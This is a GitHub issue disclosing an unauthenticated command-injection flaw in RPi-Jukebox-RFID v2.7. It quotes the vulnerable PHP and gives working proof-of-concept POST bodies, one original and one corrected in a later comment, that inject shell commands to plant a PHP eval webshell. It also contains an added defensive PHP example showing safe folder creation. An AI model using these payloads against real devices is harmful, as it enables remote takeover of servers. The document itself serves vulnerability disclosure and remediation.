🐛 | RPi-Jukebox-RFID V2.7_RCE_3 #2398

Open
xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Labels: bug, legacy_v2 (Issues, discussions and PRs related to Version 2.x), needs triage

Comments

@xjzzzxx

xjzzzxx commented Jul 11, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\manageFilesFolders.php

if (                                            // Line 90 (check point)
    isset($post['folder'])
    && $post['folder'] != ""
    && file_exists($post['folder'])
    && is_dir($post['folder'])
) {
    $moveFolder = $post['folder'];              // Line 97 (source)
} else {
    $moveFolder = $Audio_Folders_Path;
}
if (
    isset($post['folderNew'])
    && $post['folderNew'] != ""
) {
    $moveFolder = $moveFolder . "/" . $post['folderNew'];   // Line 110 (source)
    if (!file_exists($Audio_Folders_Path . "/" . $moveFolder)) {
        $exec = 'mkdir "' . $moveFolder . '"; chown -R pi:www-data "' . $moveFolder . '"; sudo chmod -R 777 "' . $moveFolder . '"';
        exec($exec);                            // Line 115 (sink)
    }
}

The sources are Line 97 ($_POST['folder']) and Line 110 ($post['folderNew']).

Then there is a check point (Line 90), which we bypass by setting $_POST['folder'] = 2.

After bypassing the check point, the tainted source is passed to $exec and exec($exec); (Line 115) without another check.

PoC

POST /htdocs/manageFilesFolders.php

Data:

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is the version without URL encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell3.php ; echo "hello

Manual verification

[screenshots of the manual verification, not included in the text extraction]

The attacker can then easily connect to this webshell (/htdocs/shell3.php).

Logs

No response

Configuration

No response

More info

No response

xjzzzxx added the bug, legacy_v2 and needs triage labels on Jul 11, 2024
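For readers triaging this report, the following is an added example of how the folder-creation step can be written so that no request data reaches a shell; it is not code from RPi-Jukebox-RFID and is not a proposed patch for the project. It keeps the project's $Audio_Folders_Path as the root of the audio tree; the function name createAudioSubfolder and the component allowlist are my own choices. The chown step of the original is omitted on the assumption that the web server already runs as the user that owns the audio tree.

```php
<?php
// Added example (not the project's code): create a subfolder below the audio
// root from untrusted POST input without passing any of it to a shell.
declare(strict_types=1);

/**
 * Returns the absolute path of the created (or already existing) folder.
 * Throws InvalidArgumentException when the input is rejected.
 *
 * $folder    optional parent directory (absolute, or relative to $audioRoot)
 * $folderNew name of the new directory (single path component)
 */
function createAudioSubfolder(string $audioRoot, string $folder, string $folderNew): string
{
    // Resolve the root once; it must exist and be a directory.
    $root = realpath($audioRoot);
    if ($root === false || !is_dir($root)) {
        throw new RuntimeException('audio root does not exist');
    }

    // A new folder name is one path component drawn from a strict allowlist:
    // letters, digits, space, dot, dash and underscore. Quotes, semicolons,
    // slashes and NUL bytes are rejected outright, so the shell metacharacters
    // used in the report cannot be expressed at all, and ".." cannot match.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9 ._-]{0,63}$/', $folderNew)
        || $folderNew === '.' || $folderNew === '..') {
        throw new InvalidArgumentException('invalid folderNew');
    }

    // The original check only asked "is this an existing directory?", which any
    // directory on the system satisfies. Here the parent must resolve to a
    // directory *inside* the audio root (realpath plus prefix comparison).
    $parent = $root;
    if ($folder !== '') {
        $candidate = ($folder[0] === '/')
            ? realpath($folder)
            : realpath($root . DIRECTORY_SEPARATOR . $folder);
        $prefix = $root . DIRECTORY_SEPARATOR;
        if ($candidate === false
            || !is_dir($candidate)
            || strncmp($candidate . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
            throw new InvalidArgumentException('folder is not inside the audio root');
        }
        $parent = $candidate;
    }

    // PHP's own mkdir()/chmod() replace the exec("mkdir ...; chown ...; chmod 777 ...")
    // string: no shell is involved, and the directory is not made world-writable.
    $target = $parent . DIRECTORY_SEPARATOR . $folderNew;
    if (!is_dir($target)) {
        if (!mkdir($target, 0775) && !is_dir($target)) {
            throw new RuntimeException('mkdir failed');
        }
        chmod($target, 0775);
    }
    return $target;
}

// Constructed demo: a scratch root, one benign name, and a reduced form of the
// reported folderNew value (quote, semicolon, redirection), which is rejected
// before any filesystem call is made.
$root = sys_get_temp_dir() . '/jukebox_demo_' . getmypid();
mkdir($root, 0775);

echo createAudioSubfolder($root, '', 'My Album 01'), "\n";

foreach (['hello" ; echo "x" > ./shell3.php ; echo "hello', '../outside', ''] as $bad) {
    try {
        createAudioSubfolder($root, '', $bad);
        echo "unexpectedly accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: {$e->getMessage()}\n";
    }
}

try {
    // Parent outside the audio root: rejected by the containment check.
    createAudioSubfolder($root, '/tmp', 'x');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Two properties matter here for anyone reviewing a fix: the input never reaches a shell (so quoting games are irrelevant), and the parent directory is checked for containment within the audio tree rather than mere existence. Either property alone would have stopped the reported request; both together also close the directory-traversal and permission-widening side effects of the original command string.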
@xjzzzxx (Author)

xjzzzxx commented Jul 12, 2024

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

PoC (fixed)

POST /htdocs/manageFilesFolders.php

Data

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell3%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is the data without URL encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval(\$_POST['shell3']) ?>" > ./shell3.php ; echo "hello

Manual verification

[screenshots of the manual verification, not included in the text extraction]
